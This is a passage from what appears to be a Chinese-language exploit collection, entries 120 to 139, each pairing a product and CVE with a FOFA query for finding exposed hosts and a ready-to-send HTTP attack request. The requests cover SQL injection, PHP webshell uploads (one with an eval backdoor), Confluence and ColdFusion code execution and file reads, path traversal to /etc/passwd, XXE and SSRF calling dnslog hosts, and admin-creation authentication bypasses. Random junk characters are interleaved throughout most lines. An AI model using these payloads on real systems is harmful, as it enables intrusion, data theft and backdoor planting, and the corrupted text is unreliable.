Sec-Fetch-Dest: empty
+ g# H; g- ~" Z* \& s, h$ K0 iSec-Fetch-Mode: cors5 T( t! e( G1 s3 e) E* D9 C
Sec-Fetch-Site: same-origin( S0 P: a( r1 H
X-Forwarded-For: 1.1.1.1
5 \4 Y2 K" j/ |/ I- zX-Originating-Ip: 1.1.1.1
- s, F! n; Q) ^' p0 Y, M7 b' OX-Remote-Ip: 1.1.1.1/ W, g) ]: E0 u: B% e
X-Remote-Addr: 1.1.1.1
6 ^' U* T" a& xTe: trailers
W" D3 N( s* f5 S! ~Connection: close O+ _! e# X. g# f+ K
7 z7 V# m6 w d# N
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456+ x. d- F, j0 p, e7 N% x' D5 o
' g; k! [4 Q- r# r p) g; G) ^: K, Q3 X$ N4 [' j+ I
120. 北京百绰智能S40管理平台导入web.php任意文件上传
4 S6 V, E+ w+ ~+ ^CVE-2024-1253
2 D/ ?+ S/ V$ f1 ^FOFA:title="Smart管理平台"
" s1 G- U. }( {POST /useratte/web.php? HTTP/1.1
3 a, ]% s' Q( ~5 HHost: ip:port
$ _5 `8 Q J Q* X+ S% m. c9 X; YCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
- y$ K4 \; Z& g/ q* nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
! h+ R# Q) x/ u4 j( c1 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 x: ^; a2 U8 i) s# E) [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% y. X$ D# C4 E, {0 q0 e/ H" {Accept-Encoding: gzip, deflate
3 T6 y% x) r5 G% TContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
+ Y! ~4 P$ Q4 B6 R' t3 Q# J) O; F' WContent-Length: 597
! @3 K" [! v5 GOrigin: https://ip:port
4 W& j, a Z. o: ?Referer: https://ip:port/sysmanage/licence.php
: p0 E" E% ~# z- b: \: GUpgrade-Insecure-Requests: 11 } |$ V2 b; k) o3 n
Sec-Fetch-Dest: document. ~ {' @# j# C/ Y7 Z+ u
Sec-Fetch-Mode: navigate
) ]' Z+ Q6 H6 y& `; ~) K1 h: r- z0 HSec-Fetch-Site: same-origin
* a8 J# q$ C8 mSec-Fetch-User: ?1
! E7 X0 D( }& C+ h UTe: trailers
# {+ t: J" F1 x1 A6 y( HConnection: close
a' [6 v" [/ ^8 |* M- h! B: E& }6 L T2 A, U4 P! n* h4 K
-----------------------------42328904123665875270630079328
) E* S0 ]& E1 L9 ~Content-Disposition: form-data; name="file_upload"; filename="2.php"
9 W# f+ Z; u3 z8 a$ |+ Z+ @) `7 cContent-Type: application/octet-stream$ W$ f1 A, p3 s5 n4 h
4 W" l0 _ {- ]. L0 G5 ~9 ^8 t
<?php phpinfo()?>. O/ p7 J* H7 b8 \+ R
-----------------------------42328904123665875270630079328 n- k' Q& c* R
Content-Disposition: form-data; name="id_type"
8 ^4 Q: ]& ?! V3 X
$ K" C2 x& A' @" S/ q4 K8 F1/ o z# Z- k' W# M9 N9 `
-----------------------------42328904123665875270630079328
& M( P1 W( D9 C# t5 y% u9 xContent-Disposition: form-data; name="1_ck"8 o; j1 b3 f: V7 M
: M- W/ c) H0 L% y1_radhttp; ^0 ~6 a' C1 F& [
-----------------------------42328904123665875270630079328
. t% a6 ?$ J! f" Z4 n/ DContent-Disposition: form-data; name="mode"9 t8 a/ S, X0 P& s
( t) v) ^9 ~' X9 Y
import
" R& G' `% r9 v+ w-----------------------------42328904123665875270630079328% |; S& u/ ]( ~7 ~- k" D, I! O1 @
/ L, ?4 n% ]: x( `
! ^- J. E3 V# T, J# F7 s文件路径/upload/2.php9 ~, ~. k6 Y, }; Q7 v
; W0 `1 [' ?! j; Y: z121. 北京百绰智能S42管理平台userattestation.php任意文件上传
0 F( ?/ r2 v! ~8 ^( ECVE-2024-1918. g% U. ^, {! Y# T1 G, l: s0 G
FOFA:title="Smart管理平台"
9 z: K1 m% K$ x7 M' [7 A0 ?5 t5 sPOST /useratte/userattestation.php HTTP/1.1# s6 `! f0 J+ `' U3 O# S9 A$ @
Host: 192.168.40.130:84431 W9 e3 u; `. B
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50 Y7 e8 f5 ]* f& ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko8 A$ F0 Y- x0 ]2 W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 Q& m; s& S5 s' f5 ?0 q; hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% U8 V+ b; R0 ?4 z& Y6 ~, MAccept-Encoding: gzip, deflate
4 \& ], i# r# c8 DContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793286 _5 C4 X0 L( l5 y/ n
Content-Length: 592
4 l9 m: f4 p9 s. O. POrigin: https://192.168.40.130:8443
; v+ u2 |( D tUpgrade-Insecure-Requests: 1
: W! T) q5 f& o$ F: vSec-Fetch-Dest: document; [, [: q9 f- l7 R, m( o2 N* f4 L
Sec-Fetch-Mode: navigate: J) R: Y" z, m! ?
Sec-Fetch-Site: same-origin
9 b: s" e1 x+ ySec-Fetch-User: ?1, } n+ N& S; c) _7 D) ?' J
Te: trailers
" c5 ?' k8 g' P$ lConnection: close2 e, r# f' S0 ^2 ?0 F8 @
- M! F8 W- B8 t' P; }" V-----------------------------423289041236658752706300793289 ^: O1 ^/ Z, T+ x6 x5 p
Content-Disposition: form-data; name="web_img"; filename="1.php". A$ q* s8 }# t+ U3 F, Q# N2 s
Content-Type: application/octet-stream
, ~/ D8 Q+ C* ?* ~; B$ O" x* @5 p* ?" e! o
<?php phpinfo();?>) r( S7 S8 j( M5 _6 P* \
-----------------------------423289041236658752706300793284 s/ X3 h9 k. p a/ S
Content-Disposition: form-data; name="id_type"+ j' L" O& O8 Q+ G8 T
; T% }8 }) L7 l( _. G* \
1$ y8 s# S, q" |+ x6 Z$ Z2 v
-----------------------------423289041236658752706300793288 U4 Y, S1 G7 L5 v4 r- Q: n
Content-Disposition: form-data; name="1_ck"
C' L& c, a7 B- M+ u6 \' Y U- I+ u; p, K. W
1_radhttp
0 N; W0 C1 b( J1 z" S& b8 m-----------------------------42328904123665875270630079328
% A5 p+ ?) f4 E2 Q( X; \- tContent-Disposition: form-data; name="hidwel"% K" g4 T; y0 m2 G3 I# K
: I2 E) B; Q- B1 J Yset* \. Z# L4 k7 ]# I7 \
-----------------------------42328904123665875270630079328
. C/ g2 w' N: N# ]$ L# F6 h8 b# o# o5 N! J; [$ x
4 N/ J7 P9 P* U( J6 p
boot/web/upload/weblogo/1.php
) c8 C' p. G8 w( g4 _6 c( y' }* R$ \0 m
122. 北京百绰智能s200管理平台/importexport.php sql注入+ L0 y! S- ]0 R2 G
CVE-2024-27718FOFA:title="Smart管理平台"
1 n! ?( \; K- f, ~; ~其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
7 ?4 B2 ~5 ^* \) h: ]; B# bGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
% b) L+ T$ R( p: m- r* h; ZHost: x.x.x.x
8 _; [9 k: E) m R( X! |. sCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
W) d# S) g1 }! O9 n5 b6 Z3 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ Z! o( ?) c2 X( gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 l4 N# M0 |* ]* ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# \* U& i5 q: W; f/ aAccept-Encoding: gzip, deflate, br* _) R" A7 e( R; t
Upgrade-Insecure-Requests: 1
" S% X( e7 u& N7 C1 s* cSec-Fetch-Dest: document. K5 \" _% Z# o; S3 W0 x* A
Sec-Fetch-Mode: navigate) R. @9 z: \- }
Sec-Fetch-Site: none
* `9 r. c2 E5 v9 J. A: p' bSec-Fetch-User: ?1+ k, Y5 M7 P2 D; {( I5 G
Te: trailers$ W2 u: g& U# ]7 [
Connection: close/ g6 R# l: @6 r7 o/ ?; X
, G$ H/ P9 C1 \+ _9 k9 Y" l! l
7 \7 M6 i. ^+ X$ w3 q' B9 b123. Atlassian Confluence 模板注入代码执行# y2 x! M3 m$ b
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
: ], Q* N- O' K+ f( TPOST /template/aui/text-inline.vm HTTP/1.1$ F: i- C5 m' T& C/ k& h. ~7 A# G
Host: localhost:8090
5 ]' t# \) n- d& m' nAccept-Encoding: gzip, deflate, br
0 `6 g9 r& A0 P$ x' X* iAccept: */*
+ |1 d7 [& g) N% g6 n, Z V3 m' pAccept-Language: en-US;q=0.9,en;q=0.8
1 S! ]/ q8 x1 j1 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
g) D/ y# h$ {Connection: close# J# h* R! [$ q8 @( I% e0 a
Content-Type: application/x-www-form-urlencoded
0 N1 S5 x: S5 z6 a
3 Y0 v* {; {; k2 N1 Slabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
9 ~" h/ K0 r) m9 a8 [
2 z5 H5 d2 `/ e5 [2 d! [+ F
# u8 i3 Y0 i+ z" h! ^( c! U& _124. 湖南建研工程质量检测系统任意文件上传: v( \ n6 q7 @# P. h( W' i
FOFA:body="/Content/Theme/Standard/webSite/login.css"9 \. W! _& Z/ b+ d3 X6 q4 h- T0 Q
POST /Scripts/admintool?type=updatefile HTTP/1.1' E. ]& X/ w% a7 N; v2 s
Host: 192.168.40.130:82825 @$ x' z K3 |' ^6 _4 D
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
) q7 _# }6 n, {6 `Content-Length: 72
! \& e# e. o0 V& y p# mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5 L. E% \8 j& ?6 vAccept-Encoding: gzip, deflate, br
) b' S9 S3 F5 ]& ]( PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 W; d- `* a" k! X$ {7 y' ~2 J2 ?
Connection: close i! @* N# ~; A2 W+ x0 [
Content-Type: application/x-www-form-urlencoded
8 S) i2 t( E3 B+ C* J+ Z6 P8 f4 F7 a& ^1 b# p7 U5 B& Q( E
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
" ?+ a8 H7 \# q/ n
3 m5 I% @1 u6 H* e8 `$ A+ ?- d( |2 y- b* c0 e' S# m8 g4 D! V
http://192.168.40.130:8282/Scripts/abcgcg.aspx
8 S4 _4 F. I' A- y& L$ Z9 o8 m# q* o; @3 `
125. ConnectWise ScreenConnect身份验证绕过( x0 ~+ }$ |5 J4 A" H7 |: P
CVE-2024-1709; t) ^& M# u" K
FOFA:icon_hash="-82958153"' r6 Q: ^+ O' H, ]# U0 R) ]% H
https://github.com/watchtowrlabs ... bypass-add-user-poc
3 H% G7 s/ u2 ?. A$ R4 R
8 t! R% F# a+ W. i) o+ D
6 Q" }2 i' f$ b- e% Z# B- g4 }使用方法, y. O1 ?0 n% K' h7 d- W( N
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!; v( L* v; Q* G; V! \4 a5 ?
/ b2 `% x/ j0 K( L2 \( t( m7 B& S
8 O" r! b3 M9 k; y' v创建好用户后直接登录后台,可以执行系统命令。; d( r) E4 Q- v$ [+ V
# T( b6 \' i1 r" r126. Aiohttp 路径遍历% H4 W/ B7 T- {2 A
FOFA:title=="ComfyUI"
) B& Y6 ~$ W- C( z, gGET /static/../../../../../etc/passwd HTTP/1.1
$ B5 i! ?2 @. D. sHost: x.x.x.x
" @, d* M4 ?0 D V a; m, sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
8 L( n: C9 U7 A9 vConnection: close
) i2 @: G1 ]7 G/ W/ ~! Z$ Q* EAccept: */*1 b7 A5 S% j- {5 z5 ~: _
Accept-Language: en
I& }" y( L: G$ f4 _8 f+ Y) dAccept-Encoding: gzip* v# \" g0 X0 F9 v" q9 C, E
1 y. @2 \, Y+ I; I
9 l. {/ Y% q* b; }* a127. 广联达Linkworks DataExchange.ashx XXE
; h* x2 f2 P; HFOFA:body="Services/Identification/login.ashx"
) L+ ^- k2 v1 KPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
) ~) p9 D0 i0 r6 z _! }" PHost: 192.168.40.130:8888
5 ]1 C2 @3 i* ~$ i0 o( c yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36: }3 F% g8 V$ j3 a" l+ Z- L; M
Content-Length: 415! E$ s9 S: R- |5 h9 @, h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; H0 A) r g! W9 S8 L- z. C/ qAccept-Encoding: gzip, deflate& R& ?2 e; ]' D- q, [2 l" T
Accept-Language: zh-CN,zh;q=0.9. y0 k7 O9 `9 m' ^( t. M: `% t' F
Connection: close6 ]2 E$ Y) d) w
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
: X: P3 }( y7 J% P6 y9 CPurpose: prefetch" J8 ~+ k/ c1 Y5 M( l3 [* j7 g5 Z
Sec-Purpose: prefetch;prerender+ Q& f/ @! R& W- _& x
% P& B- L/ s6 j1 k8 p------WebKitFormBoundaryJGgV5l5ta05yAIe0
5 Q& a3 V. a* _! Q6 ]6 d# R+ qContent-Disposition: form-data;name="SystemName"
! x+ r( x d$ a% v ^) A4 _; b1 z' c) O' J3 X
BIM5 r) e# ?' ~) N6 @
------WebKitFormBoundaryJGgV5l5ta05yAIe0
7 x/ U- I' a5 y. fContent-Disposition: form-data;name="Params"
5 B$ d7 r' D' s+ S) {9 qContent-Type: text/plain: c3 V/ e3 e, m, z9 |
) X X! {, v" U; V5 q! }<?xml version="1.0" encoding="UTF-8"?>+ d& l: D$ Z3 H6 X
<!DOCTYPE test [1 E" z) M7 ]( ~! T
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
, t# e3 P0 ?/ E4 H2 T w]+ n5 ^/ U! Y; O! P7 N0 o( `
>
, I: r$ B* R; ~4 Z: n' ?( }<test>&t;</test>
/ G& H5 P) Y9 r; S Y) }* m------WebKitFormBoundaryJGgV5l5ta05yAIe0--' I9 O. t# V* a, E
: E7 B% X* l' x K- I
/ P+ k' }# n; m
( ~ m' _# s" q8 X s9 V: p128. Adobe ColdFusion 反序列化9 O: v6 i3 s y" M5 c
CVE-2023-38203" `, S8 A& d5 v" F
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)5 F" B. h; Z3 Q' A) P
FOFA:app="Adobe-ColdFusion"4 u( \7 n7 \ j6 o0 D
PAYLOAD" J! d, T0 k1 R% Q
( [. r+ T/ x& T' e! ^
129. Adobe ColdFusion 任意文件读取
' B1 z* B U3 U- hCVE-2024-20767
$ G4 l4 F0 Z6 p$ w% y7 u! K* j$ mFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request") l0 O9 Z: S" m- O7 j- W/ M
第一步,获取uuid1 t& z: m) z9 z8 W
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1% U6 [) w6 F) Q. h. X" ]( h
Host: x.x.x.x
' @/ j, {1 w% p" _; b" r- PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 m, k# E; o! r, GAccept: */*
. z% b \9 H( x; _Accept-Encoding: gzip, deflate c+ ^, x N- j0 g* ?! w0 A4 \: |& ?
Connection: close1 |% {& y7 E9 p; u/ J
# @$ g Z9 \" d# [5 E" c
; V; f* d4 Z5 _3 F- e8 l) f* ?! o第二步,读取/etc/passwd文件1 X* J2 t( U+ p
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1# R* K* u8 K* [9 v+ y; O
Host: x.x.x.x& Y6 T( B2 q( a. y" U8 p4 w" t' m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
l" \/ }7 W( g' Q" i! aAccept: */*
( w4 {0 v* x( f4 BAccept-Encoding: gzip, deflate+ M: Y* y9 T$ n4 X# d% i+ g6 e$ _
Connection: close* X* K# l+ ]& d/ Q
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
( n3 Z* k8 ]8 u) a. o" O/ Q+ c' }# X! u5 z0 x+ ~
$ p* V8 V9 a3 C- m4 y5 o; T3 c* M130. Laykefu客服系统任意文件上传( v# W& R0 `0 u/ n0 d
FOFA:icon_hash="-334624619"
. d1 _& O: T3 I1 T3 i8 KPOST /admin/users/upavatar.html HTTP/1.15 Y: b' Y) s4 v% B$ S7 _; t
Host: 127.0.0.1' s8 k- r+ }; s* s
Accept: application/json, text/javascript, */*; q=0.01
+ b0 Y" o2 N/ Y% |* p o% HX-Requested-With: XMLHttpRequest
2 `: c& t, z8 i; G# rUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
% V4 @2 V; ]2 U8 `, M& W7 tContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR* D2 R( t4 C4 J n
Accept-Encoding: gzip, deflate
! M p2 K# a9 e* z8 zAccept-Language: zh-CN,zh;q=0.9! N& U" G7 R5 u6 i! |1 l
Cookie: user_name=1; user_id=3" T; h% @6 I# j( h
Connection: close
( W% C/ `5 m- P. p; [* Q/ f: {# Z" A9 k, w
------WebKitFormBoundary3OCVBiwBVsNuB2kR
% G8 }% L, f8 G& mContent-Disposition: form-data; name="file"; filename="1.php"
1 m5 W+ y* b& T5 {Content-Type: image/png, B- j b% h6 d% O4 g
8 b. I) a/ `$ R! w3 _<?php phpinfo();@eval($_POST['sec']);?>& j' a# f) L0 X1 r0 L: a
------WebKitFormBoundary3OCVBiwBVsNuB2kR--4 P! T, S* u1 v7 `
; s. `! H/ Y, C* i. c
+ m5 ~4 y5 e! J131. Mini-Tmall <=20231017 SQL注入" f8 P+ x/ b. u- F2 G
FOFA:icon_hash="-2087517259"$ e! ]. F; o8 A* @, n- Y: ^
后台地址:http://localhost:8080/tmall/admin
; x& `, t) O3 T4 E1 Phttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
; @9 d9 h7 W- I. d4 V, R, [% M3 q# R0 m
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过1 q) x* w9 x, w# z
CVE-2024-27198
( G* n4 [1 J; y9 G$ NFOFA:body="Log in to TeamCity"( w" K( e# _3 K/ _0 w6 i
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
8 m7 D. d+ o' w9 s8 fHost: 192.168.40.130:81115 l0 J) x$ ?' J# i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 b( L$ q/ J9 f) p/ d
Accept: */*
5 Y5 [- i. o% K3 NContent-Type: application/json
' O$ ]- n M: z# I# pAccept-Encoding: gzip, deflate
4 c* M% V `" H" `: y( ^8 i2 r9 [9 Y* C, ~% t$ W
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
Y3 z9 t h4 c: R8 n) |' _
3 ]) H( V: q, g2 |4 M3 T" B! Y& W" [( V/ C$ L
CVE-2024-271994 h: U' N& l) n* K
/res/../admin/diagnostic.jsp
1 R% I0 C7 ~/ ?/.well-known/acme-challenge/../../admin/diagnostic.jsp9 x6 u$ [; A* [
/update/../admin/diagnostic.jsp
% H4 W( g4 \# @% E2 s: D$ g! I; u% I2 ?. z1 E3 [
8 V9 J# e' [# b1 f0 s4 O
CVE-2024-27198-RCE.py) k# m/ A: V2 S2 Q3 C) Q5 t, ?( s( d
' X9 [* N: p4 p# I1 Q8 N
133. H5 云商城 file.php 文件上传
8 K/ b5 ~: l0 c, C8 ], t7 K9 SFOFA:body="/public/qbsp.php"4 ^. n9 M. S% r f+ }9 T
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
% E5 x) E L$ h3 L# u2 l2 SHost: your-ip
1 n; b v7 X) ^: ?% {; MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ W/ U4 ]. D& q. h+ P3 D/ p$ VContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
" a* ~! n: r" U1 m9 i3 |% b
+ X$ v0 O6 |, e------WebKitFormBoundaryFQqYtrIWb8iBxUCx& C! W# c. c; G
Content-Disposition: form-data; name="file"; filename="rce.php"
0 h2 k: C. A) M6 P5 b8 b0 }: {Content-Type: application/octet-stream
\" b. \! U2 d
B% d" {' `: Q0 _% k$ Y<?php system("cat /etc/passwd");unlink(__FILE__);?>8 T3 a! C/ l# c& E( U
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
, r" ~0 T7 q6 L& t: ?6 i4 @# x1 d) M" Q. E) a& r, u. x6 [
: }6 M% I- s3 H& d" A: u. j5 B0 s
134. 网康NS-ASG应用安全网关index.php sql注入5 y9 p: Z. d S T: v* o( L3 r9 C
CVE-2024-2330
2 v0 p" U6 _% ]! u3 k0 r* w+ ANetentsec NS-ASG Application Security Gateway 6.3版本) ]& A2 @. b5 q5 x
FOFA:app="网康科技-NS-ASG安全网关"
1 h: B8 |9 D; K0 \( w3 WPOST /protocol/index.php HTTP/1.1( k6 O4 ?" K- `& V% x$ b5 @
Host: x.x.x.x0 j! o5 J: S! n( x! D
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de4 N5 ^$ \( S6 A( C& M' V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.02 D; f: \& Z8 m( H' x$ n1 Y8 I" E
Accept: */*
/ [- c/ H% ^% Y" T/ dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ x5 [1 X, k' o6 {7 o
Accept-Encoding: gzip, deflate
3 _5 |. p" z' |( h0 XSec-Fetch-Dest: empty1 u; V+ y7 q/ {9 q6 T
Sec-Fetch-Mode: cors; \; n' u- v F: r9 L/ O
Sec-Fetch-Site: same-origin
; J& J7 d' y2 z+ wTe: trailers
. q( E( R' t# x5 A7 GConnection: close
% j) Z; V' R2 e/ X3 A7 l% ?9 E# kContent-Type: application/x-www-form-urlencoded* k0 t* L7 M. v* ?/ [) g
Content-Length: 263
7 S, D) A: \4 a. Y+ y. {; p5 j* m/ f+ `9 @. X& ^
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
# o% P4 {$ G' p8 }2 m8 A9 o( F
. Y+ Z5 z! o' p9 R; ]
9 Q. r' G; O# a, D4 E135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
! L% x. D' b! {/ |6 h' fCVE-2024-2022! w, G, U: X! \+ I
Netentsec NS-ASG Application Security Gateway 6.3版本% O. t9 C5 G: L& e
FOFA:app="网康科技-NS-ASG安全网关"
1 q6 F7 |7 }& {6 aGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
1 s) j/ B& p: R+ _0 |6 V; LHost: x.x.x.x- v P- M5 n1 Y. c5 H2 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& s l: f- T1 a& E9 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 F6 r: S9 T# u) \- ZAccept-Encoding: gzip, deflate K( ~* ^1 @' v; }2 E, g# a& q# U
Accept-Language: zh-CN,zh;q=0.9 n% l- P' f$ n$ I" ?
Connection: close
# d$ Z% q7 {( I7 M5 _) M; P. A3 t$ ]7 y
8 [- z5 X7 x/ p4 U
136. NextChat cors SSRF) @8 |2 Y4 n2 A$ n9 g: y
CVE-2023-49785
; ^# {7 q: f" p# \0 LFOFA:title="NextChat"2 {6 P" M2 k/ P H$ b4 y" w v% Z7 q6 n
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.19 d- P( ?) D; R% S5 j
Host: x.x.x.x:100009 c( w Z& x% | Q" c" T" H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 u0 }/ K& d4 @
Connection: close ]1 {7 Z$ m+ l5 b& R! b' z
Accept: */*! E/ k2 ? g; V# ~: E( m
Accept-Language: en
: x& g0 o* x0 h5 r: g+ UAccept-Encoding: gzip7 X- {* Z2 e) b
J. }" s( U- E j
# _/ \/ A; Y4 x* n( e137. 福建科立迅通信指挥调度平台down_file.php sql注入
% r# }* a- L5 P; wCVE-2024-2620
8 l* {/ V# ^ R N6 t9 ~# EFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
+ o4 g& X8 w5 H% f- U h; KGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
: _* h" @$ n8 [, r: k( I% nHost: x.x.x.x
& n; @" {: ~& l2 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" N- K" n" H) }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. N* t# M& v: |( \: ]# u' OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& m$ K& J+ f. s8 Q1 e6 q/ Q
Accept-Encoding: gzip, deflate, br4 r0 Y9 N, m6 ^+ A# [' {- }. G) M0 s C
Connection: close
! S0 T- t7 _( O4 {9 kCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj! Q* b9 C' \, ?" }
Upgrade-Insecure-Requests: 1$ E. B6 b" T% G# A2 h( W
2 S4 z; U8 @9 `, b" S" H. V% d
% B( {; j6 s/ L+ W138. 福建科立讯通信指挥调度平台pwd_update.php sql注入. T$ a9 Y. I/ {7 k7 O0 a# R
CVE-2024-2621
$ o7 B$ s+ e" o3 ?FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" t* H6 Y" ^6 q0 x1 u
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.15 Q1 V1 ~' G6 f/ k8 o, \9 l
Host: x.x.x.x! V' |; `, v$ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( \, R. E6 {2 ~( bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& b4 |9 s+ x% W5 B, h9 }& h" @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" x( `6 r7 n4 v0 {- N5 I
Accept-Encoding: gzip, deflate, br- `: j5 y) d( ^ E# F
Connection: close
. U! v7 n8 S6 HUpgrade-Insecure-Requests: 1 x2 U$ h1 m$ q# H( m
, u2 b. {8 D9 {8 A0 A& h
3 R, Y: d! O. H; P, Y5 P6 Q139. 福建科立讯通信指挥调度平台editemedia.php sql注入, k5 v& R$ t/ p8 ]0 y
CVE-2024-26223 e* V0 g: P2 z4 x# i
